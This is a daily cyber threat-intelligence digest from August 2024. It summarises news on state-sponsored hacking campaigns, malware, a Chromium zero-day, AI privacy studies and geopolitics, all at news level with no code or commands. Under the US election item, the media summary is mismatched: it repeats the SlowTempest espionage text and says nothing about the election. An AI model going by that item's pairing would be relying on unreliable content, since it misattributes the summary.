Daily Drop (853): | Citrine Sleet | APT42 | DPRK: NPM | SlowTempest | CN and JP | GPT Apps: Collect Data | GlobalProtect VPN | LLMs | US Election | Zetas Founder |
08-31-24
Saturday, Aug 31 2024 // (IG): BB // ShadowNews // Coffee for Bob
Measures of Effectiveness (MoE):
MoEs are used to assess how well a system or operation achieves its intended goals. They are qualitative or quantitative metrics that reflect the success of achieving desired outcomes. For example, in a cybersecurity context, an MoE could be the reduction in successful cyber-attacks after implementing new security protocols.
Results: We are seeing an uptick in “163.com”, “189.com” and “QQ” subscribers.
Mexican Drug Lord and Zetas Founder Released from U.S. Prison, Faces Deportation
Bottom Line Up Front (BLUF): Osiel Cárdenas, the notorious leader of Mexico's Gulf Cartel and founder of the ultra-violent Zetas, has been released from a U.S. prison and handed over to immigration authorities. His release raises concerns about his potential deportation to Mexico, where he faces outstanding charges.
Analyst Comments: The release of Osiel Cárdenas marks a significant moment in Mexico's ongoing struggle with cartel violence. As the architect of the Zetas' brutal tactics, Cárdenas played a pivotal role in shaping the violent landscape of Mexico's drug war. His potential return to Mexico could reignite tensions, especially if he seeks to regain influence in the cartel world. The situation also underscores the complex relationship between U.S. and Mexican law enforcement in managing high-profile criminals whose actions have had far-reaching consequences on both sides of the border.
FROM THE MEDIA: On August 30, 2024, Osiel Cárdenas, former leader of Mexico's Gulf Cartel and founder of the Zetas, was released from a U.S. prison after serving part of his 25-year sentence. Cárdenas, who was extradited to the U.S. in 2007, is now in the custody of U.S. Immigration and Customs Enforcement (ICE) and may be deported to Mexico, where he faces additional charges. Cárdenas is infamous for his role in escalating cartel violence through the Zetas, a group known for its extreme brutality and expansion into various criminal enterprises beyond drug trafficking. His release and possible return to Mexico are being closely watched by both U.S. and Mexican authorities, given the potential implications for regional security.
READ THE STORY: Reuters
The 2024 US Election and Immigration: Key Strategies and Implications
Bottom Line Up Front (BLUF): As the 2024 US election approaches, immigration has emerged as a critical issue, with Kamala Harris and Donald Trump presenting starkly different strategies. Harris aims to shift the narrative by attacking Republican policies on border security, while Trump has pledged mass deportations if re-elected. Both approaches will significantly impact the political landscape and voter sentiment on immigration.
Analyst Comments: Immigration remains a challenging issue for Democrats, often seen as a vulnerability due to Republican emphasis on border security. Kamala Harris's attempt to take a more aggressive stance might resonate with voters concerned about the current state of the border, but it risks alienating the Democratic base if perceived as too harsh. On the other hand, Trump's promise of mass deportations is a continuation of his hardline stance, appealing to his core supporters but raising legal and logistical questions about the feasibility of such actions. The effectiveness of these strategies will likely hinge on how well each campaign can balance tough rhetoric with practical solutions.
FROM THE MEDIA: The SlowTempest espionage campaign, uncovered by Securonix, demonstrates a coordinated effort to infiltrate high-profile sectors in China. The attackers used phishing emails with malicious .zip files to bypass antivirus systems and gain access to networks, where they established persistence for over two weeks. Despite no definitive link to known threat groups, the campaign's use of tools like CobaltStrike and advanced lateral movement techniques indicates a high level of expertise. The ongoing nature of these attacks suggests a broader, unresolved threat to Chinese businesses and government entities.
READ THE STORY: Economist
Japan Protests Chinese Naval Incursion Amid Rising Tensions
Bottom Line Up Front (BLUF): Japan has lodged a formal protest with China after a Chinese naval survey vessel entered Japanese territorial waters, marking the second incursion within a week. The incident adds to growing tensions as Japan bolsters its defense capabilities in response to increasing Chinese military activities near its borders and around Taiwan.
Analyst Comments: The repeated incursions by Chinese military vessels into Japanese waters reflect a broader strategy by Beijing to assert its territorial claims and test Japan's response. These actions are likely to heighten Japan's sense of urgency regarding its defense buildup and could further strain Sino-Japanese relations, especially as Tokyo continues to align more closely with its Western allies in countering China's regional ambitions.
FROM THE MEDIA: On August 31, 2024, Japan detected a Chinese naval survey vessel in its territorial waters off Kagoshima Prefecture, which departed after two hours. This marks the tenth such intrusion by Chinese vessels in the past year, prompting Japan to express its "strong concern and protest" to China. The incident follows an earlier airspace violation by a Chinese military aircraft, which Tokyo described as "utterly unacceptable." These repeated incursions are contributing to increased military tensions in the region as Japan undertakes a significant defense buildup to deter potential threats from China.
READ THE STORY: Reuters
Examining the True Capabilities and Limitations of Large Language Models
Bottom Line Up Front (BLUF): A recent study challenges the notion that Large Language Models (LLMs) truly understand language, arguing that these models are sophisticated tools that simulate language but do not capture the full spectrum of human linguistic behavior. The research calls for a more cautious approach to the deployment and regulation of LLMs, particularly in critical areas like medicine and education.
Analyst Comments: The growing use of LLMs in various industries, coupled with the hyperbolic claims about their capabilities, raises significant ethical and practical concerns. This study underscores the importance of understanding the fundamental differences between human cognition and AI-driven language processing. As the AI industry continues to push the boundaries, there is a pressing need for rigorous testing and regulation to prevent the misuse of these technologies in domains where human lives and social dynamics are at stake.
FROM THE MEDIA: The study, led by Abeba Birhane and Marek McGann, critiques the current enthusiasm surrounding LLMs like OpenAI's models, which are often portrayed as approaching human-like understanding of language. The researchers argue that LLMs, while impressive in their engineering, lack the embodied and social context that defines human language. They warn that treating these models as true language understanding systems could have serious implications for policymaking, regulation, and the broader society. The study advocates for a more grounded perspective on what LLMs can and cannot do, especially as they are increasingly integrated into high-stakes areas like healthcare and legal services.
READ THE STORY: The Register
New Malware Impersonates Palo Alto VPN in Sophisticated Middle East Cyber Campaign
Bottom Line Up Front (BLUF): Cybersecurity researchers have uncovered a new malware campaign targeting Middle East users by disguising itself as Palo Alto Networks' GlobalProtect VPN tool. The malware, capable of executing remote PowerShell commands and exfiltrating data, poses a significant threat by blending into legitimate network traffic.
Analyst Comments: The discovery of this malware highlights the growing sophistication of cyber threats in the Middle East, where attackers are increasingly using advanced techniques to evade detection. The use of a well-known VPN brand like Palo Alto's GlobalProtect to deliver malware indicates a targeted approach aimed at deceiving users into compromising their systems. This tactic, combined with the malware’s ability to evade sandboxing solutions, suggests the involvement of highly skilled threat actors, potentially linked to espionage or state-sponsored activities.
FROM THE MEDIA: Researchers at Trend Micro have identified a new malware strain that mimics the Palo Alto Networks GlobalProtect VPN to target users in the Middle East, particularly in the UAE. The malware is distributed via a setup.exe file, which installs a backdoor allowing attackers to execute commands, upload and download files, and exfiltrate sensitive data to a command-and-control server. The campaign’s use of a fake VPN portal, "sharjahconnect," to disguise malicious activity underscores the threat’s ability to blend in with normal network traffic, making detection and mitigation more challenging.
READ THE STORY: THN
Iran's Fake Recruiting Sites Used to Identify and Target Double Agents
Bottom Line Up Front (BLUF): A newly uncovered Iranian cyber campaign has used fake recruiting websites and social media accounts to identify and target Farsi-speaking individuals, including potential double agents and dissidents. The operation believed to be linked to Iran's Islamic Revolutionary Guard Corps (IRGC), involved gathering sensitive personal information through fraudulent job offers.
Analyst Comments: This campaign underscores Iran's continued use of cyber tactics to identify and neutralize perceived threats both domestically and internationally. The operation's sophisticated use of social engineering and fake online infrastructure reflects a broader strategy by the Iranian regime to tighten internal security and counter external influences. The overlap with tactics used by known Iranian cyber units like APT42 further suggests a coordinated effort to bolster national security through digital surveillance.
FROM THE MEDIA: Mandiant researchers have revealed that Iranian actors, likely affiliated with the IRGC, operated fake recruiting websites and social media accounts to trap Farsi-speaking targets. The campaign, running from 2017 to March 2024, aimed to gather personal information from individuals in Iran and abroad by luring them with fake job offers related to Israel. The collected data could be used for further surveillance or direct action against these individuals, raising significant concerns about both privacy and personal safety. The operation's connection to known Iranian cyber activities highlights its potential state-sponsored origins.
READ THE STORY: The Register // THN
North Korean Hackers Target Developers with Malicious npm Packages in Cryptocurrency Heist Campaign
Bottom Line Up Front (BLUF): North Korean cyber actors have been deploying malicious npm packages to target software developers, aiming to infiltrate systems, steal sensitive data, and hijack cryptocurrency assets. The campaign, known as "Contagious Interview," leverages obfuscated JavaScript and fake job interview scenarios to trick developers into installing malware.
Analyst Comments: This latest North Korean cyber operation underscores the evolving threat landscape in the software supply chain, particularly for developers working in cryptocurrency and tech industries. By exploiting trusted platforms like npm, attackers can stealthily distribute malware, emphasizing the need for rigorous security protocols in software development environments. The use of social engineering tactics combined with sophisticated malware delivery illustrates the increasing complexity of state-sponsored cyber threats.
FROM THE MEDIA: Between August 12 and 27, 2024, North Korean hackers, linked to the group "Famous Chollima," launched a new wave of attacks targeting developers via npm packages such as "temp-etherscan-api" and "helmet-validate." These packages embed malicious JavaScript to execute code from a remote domain, aiming to steal data from cryptocurrency wallets and establish persistence on infected systems. This campaign is part of a broader strategy where the attackers pose as recruiters in fake job interviews, tricking developers into installing malware. The campaign's reach has been extensive, affecting over 100 companies globally, particularly in the technology, financial, and media sectors.
READ THE STORY: THN
Study Reveals GPT Apps Collect Data in Violation of Privacy Policies
Bottom Line Up Front (BLUF): A recent study by researchers from Washington University reveals that many GPT apps in OpenAI's GPT Store are collecting user data, including sensitive information, without proper disclosure, violating OpenAI's privacy policies. The study also highlights security risks associated with these practices, especially in third-party Actions used within the GPT ecosystem.
Analyst Comments: The findings raise significant concerns about the privacy and security practices within the GPT ecosystem, particularly regarding third-party developers. The lack of transparency and inconsistent enforcement of OpenAI's privacy policies could lead to data breaches or misuse, especially when sensitive information like passwords is involved. As the use of AI-driven applications grows, stronger oversight and better privacy controls will be crucial to protect users.
FROM THE MEDIA: Researchers examined nearly 120,000 GPTs and over 2,500 Actions in OpenAI's GPT Store, finding that many apps collect data such as passwords, personal information, and browsing history without proper disclosure. Only a small fraction of these Actions disclosed their data collection practices, raising concerns about privacy violations. The study found that some apps could potentially expose sensitive data across multiple services due to shared memory space, increasing the risk of data leaks. Despite OpenAI's removal of some non-compliant GPTs, the researchers argue that current measures are insufficient to safeguard user data in this rapidly expanding ecosystem.
READ THE STORY: The Register
CrowdStrike Addresses Global IT Outage Caused by Software Update Flaw
Bottom Line Up Front (BLUF): Cybersecurity firm CrowdStrike is urgently working to resolve a major IT outage that affected Microsoft Windows users worldwide. The issue, stemming from a defect in a software update, caused widespread disruptions, including system crashes and downtime across various sectors.
Analyst Comments: This incident highlights the risks associated with software updates in complex IT environments, where interactions between different systems can lead to unforeseen consequences. CrowdStrike’s swift acknowledgment and efforts to address the problem are crucial, but the scale of the outage and its impact on critical infrastructure like healthcare and transportation underscore the importance of rigorous testing and contingency planning in cybersecurity operations.
FROM THE MEDIA: On July 19, 2024, CrowdStrike identified a defect in a recent software update that led to a global IT outage, particularly affecting Microsoft Windows users. The issue, which caused systems to crash and go offline, prompted a coordinated response from government and industry sectors. CrowdStrike CEO George Kurtz emphasized that this was not a security breach but a software conflict, and the company is actively working to restore services. The outage has had significant repercussions, especially in the UK, where it disrupted healthcare services and transportation systems. The situation is ongoing, with CrowdStrike continuing to deploy fixes and assist affected customers.
READ THE STORY: Yahoo
"SlowTempest" Espionage Campaign Targets Chinese Entities with Advanced Malware
Bottom Line Up Front (BLUF): Securonix researchers have identified a sophisticated cyber-espionage operation, dubbed "SlowTempest," targeting individuals and organizations within China. The campaign involves the use of phishing emails containing malicious .zip files designed to infiltrate systems, exfiltrate sensitive data, and maintain long-term access for potential sabotage.
Analyst Comments: The "SlowTempest" campaign highlights the increasing complexity of cyber threats within China, focusing on persistent access and data collection. The attackers' use of advanced tools and techniques, such as custom malware and exploitation frameworks, suggests the involvement of seasoned cybercriminals, potentially linked to state-sponsored activities. This operation's focus on Chinese-speaking targets and infrastructure reflects a deep understanding of the region, raising concerns about internal security and the effectiveness of traditional defense mechanisms.
FROM THE MEDIA: The SlowTempest espionage campaign, uncovered by Securonix, demonstrates a coordinated effort to infiltrate high-profile sectors in China. The attackers used phishing emails with malicious .zip files to bypass antivirus systems and gain access to networks, where they established persistence for over two weeks. Despite no definitive link to known threat groups, the campaign's use of tools like CobaltStrike and advanced lateral movement techniques indicates a high level of expertise. The ongoing nature of these attacks suggests a broader, unresolved threat to Chinese businesses and government entities.
READ THE STORY: The Record
DPRK: FudModule Rootkit in Financial Sector Attack
Bottom Line Up Front (BLUF): North Korean threat group Citrine Sleet has exploited a zero-day vulnerability in Google's Chromium browser to deploy the FudModule rootkit, targeting the cryptocurrency industry. The attack involved a sophisticated multi-stage process, including social engineering and leveraging multiple vulnerabilities to gain deep system access.
Analyst Comments: The use of a Chromium zero-day by North Korean actors underscores the increasing complexity and coordination in state-sponsored cyberattacks. This operation, targeting the lucrative cryptocurrency sector, highlights the persistent threat these groups pose, particularly in exploiting newly discovered vulnerabilities before they are widely patched. The deployment of the FudModule rootkit, known for its advanced stealth capabilities, further illustrates the strategic intent to establish long-term, undetected access for financial theft and espionage.
FROM THE MEDIA: Citrine Sleet, a North Korean threat actor linked to the Lazarus Group, exploited a type confusion vulnerability (CVE-2024-7971) in Chromium’s V8 engine to deploy the FudModule rootkit. The attack began with a social engineering campaign leading victims to a malicious site, which triggered the exploit and allowed the attackers to gain remote code execution. Once inside, the FudModule rootkit provided persistent access by manipulating kernel security mechanisms, enabling the attackers to evade detection and maintain control over compromised systems. Despite a patch being released by Google, the attackers successfully exploited the vulnerability, demonstrating the rapid and sophisticated nature of modern cyber threats.
READ THE STORY: The Cyberexpress // THN
Items of interest
Green Berets Employ Cyber Warfare in Swift Response 2024 Exercise
Bottom Line Up Front (BLUF): During the NATO Swift Response 2024 exercise in Sweden, U.S. Army Green Berets utilized advanced cyber technology to breach a target building's security systems. This integration of cyber warfare into special operations highlights the evolving capabilities of elite forces in modern combat scenarios.
Analyst Comments: The use of cyber technology by Green Berets during Swift Response 2024 marks a significant evolution in special operations, emphasizing the importance of integrating digital and physical tactics. This exercise illustrates the increasing relevance of cyber capabilities in military operations, particularly for elite units like the Green Berets. Their ability to infiltrate and disrupt enemy networks in real-time reflects broader trends in modern warfare, where cyberspace is becoming as crucial as traditional battlefields.
FROM THE MEDIA: In Swift Response 2024, Green Berets from the 10th Special Forces Group showcased their proficiency in cyber warfare by hacking into a target building's Wi-Fi network in Sweden. After gaining control over the building's security systems, another team parachuted into the area, completed the infiltration, and left behind signal-jamming equipment. This exercise demonstrates the merging of cyber and physical operations, a critical capability in today's military strategy, especially within NATO's collaborative defense framework.
READ THE STORY: The Register // Army
3 Levels of WiFi Hacking (Video)
FROM THE MEDIA: WiFi hacking is very much still a thing performed by both white hat and black hat hackers. In this video, NetworkChuck will demonstrate how hackers might hack a wifi network from three different levels or perspectives, a Noob, Hipster and Pro. All of the wireless attacks demonstrated in this video are real and possible. The purpose of this video is NOT to equip an army of skiddies but to educate people on how WiFi hacks occur and what they can do to protect themselves and the networks they run.
The World's Most Powerful Cyber Armies (Video)
FROM THE MEDIA: Discover the advanced forces shaping the digital battlefield. This in-depth analysis delves into the elite cyber armies protecting nations and wielding unprecedented power in cyberspace. Uncover the strategies, technologies, and key players driving these formidable entities as they navigate the complex world of cyber warfare. Perfect for cybersecurity professionals, tech enthusiasts, and anyone interested in the future of digital defense.
The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.